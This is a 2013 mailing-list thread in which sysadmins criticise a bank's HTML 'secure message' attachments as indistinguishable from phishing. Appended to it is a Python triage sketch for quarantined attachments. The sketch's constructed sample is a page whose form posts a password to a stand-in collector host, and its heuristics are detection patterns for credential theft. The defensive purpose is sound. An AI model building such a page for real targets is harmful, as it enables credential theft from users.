The reply from the customer support is “Currently, our system is set to send 
the remittances in the secure format.  The only other option would be for us to 
change the format to non-secure, this way the email won’t contain any html 
files.”
 
This brings to mind a tagline that used to appear in the ASR newsgroup … "I 
would like to shake the hand of the man who first decided that e-mail clients 
should slice, dice and run arbitrary programs. Then I'd like to stir, blend and 
puree his hand."
 
ROT-13 would be a lot less dangerous and probably more secure - "V jbhyq yvxr 
gb funxr gur unaq bs gur zna jub svefg qrpvqrq gung r-znvy pyvragf fubhyq 
fyvpr, qvpr naq eha neovgenel cebtenzf. Gura V'q yvxr gb fgve, oyraq naq cherr 
uvf unaq."
 
 
From: General [mailto:[email protected]] On Behalf Of Shannon Roddy
Sent: Wednesday, December 04, 2013 1:33 PM
To: [email protected]
Subject: Re: [brlug-general] Spearfishing
 
It appears to me to be Cisco IronPort.  
 
http://www.networkworld.com/community/node/19588
 
Yuck.
 
On Wed, Dec 4, 2013 at 1:40 PM, Jarred White <[email protected]> wrote:
It looks to be legit, but what an awful freaking idea BofA. 

http://securemsg.bankofamerica.com/Secure_Email_Recipient_Guide_en.pdf
 
On Wed, Dec 4, 2013 at 1:32 PM, Keith Stokes <[email protected]> wrote:
Yes, unfortunately it is this easy.
 
On Dec 4, 2013, at 12:21 PM, Edmund Cramp <[email protected]> wrote:
 
A user received an email that purports to come from one of our customers with 
the instructions:

"Click the securedoc.html attachment to open (view) the secure message. For 
best results, save the file first and open it from the saved location using a 
Web browser."

My email system very sensibly stripped and quarantined the file, and stored it 
with a couple of hundred assorted New Order.zip and payroll report.xls 
files in the quarantine directory.  Opening the file with notepad shows it to 
be mostly JavaScript with various references that make it appear to come from 
the Bank of America.

My immediate reaction was unprintable but hell, assuming that it's "real" and 
that's not certain yet, these people want me to let users open any HTML web 
page that floats into their inbox?

This has got to be a gift from the gods if you are up to mischief - just email 
everyone a securedoc.html file and they will open it and enter their password 
... which javascript (love that stuff) will promptly send to the web site of 
your choice.

Spearfishing is this easy?

Edmund Cramp - google.com/+edmundcramp
-- 
I am a drinker with writing problems. Brendan Behan


_______________________________________________
General mailing list
[email protected]
http://brlug.net/mailman/listinfo/general_brlug.net
 

---
 
Keith Stokes
 




-- 
~Running amok on technology with no apologies


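Added example, not part of the thread and not any vendor's code: a sketch of the triage a mail gateway could run on a quarantined HTML attachment, checking the three traits the thread describes (a password prompt, a remote destination, a body that is mostly script). The class and function names, the 0.5 script threshold and the sample host are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class AttachmentTriage(HTMLParser):
    """Collect the traits of an HTML attachment that the thread worries about."""
    def __init__(self):
        super().__init__()
        self.password_fields = self.script_chars = self.total_chars = 0
        self.remote_hosts = set()      # hosts named in <form action> / <script src>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        # Only these two attributes are inspected here; relative URLs have no host.
        url = a.get({"script": "src", "form": "action"}.get(tag, ""))
        host = urlparse(url or "").hostname
        if host:
            self.remote_hosts.add(host)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        self.total_chars += len(data)
        self.script_chars += len(data) if self._in_script else 0

def triage(html_text, trusted_hosts=()):
    p = AttachmentTriage()
    p.feed(html_text)
    p.close()
    reasons = []
    if p.password_fields:
        reasons.append("asks for a password")
    untrusted = sorted(p.remote_hosts - set(trusted_hosts))
    if untrusted:
        reasons.append("references " + ", ".join(untrusted))
    if p.total_chars and p.script_chars / p.total_chars > 0.5:  # assumed threshold
        reasons.append("mostly script")
    return {"quarantine": bool(reasons), "reasons": reasons}

# Constructed sample, not the attachment from the thread.
SAMPLE = ('<p>Secure message</p><form action="https://collector.example.invalid/go">'
          '<input type="password" name="pw"></form>'
          '<script>var a = "constructed filler text"; document.title = a + a;</script>')
```

Calling `triage(SAMPLE)` returns all three reasons; passing the host in `trusted_hosts` removes only the destination reason, so a password prompt in an attachment is still held.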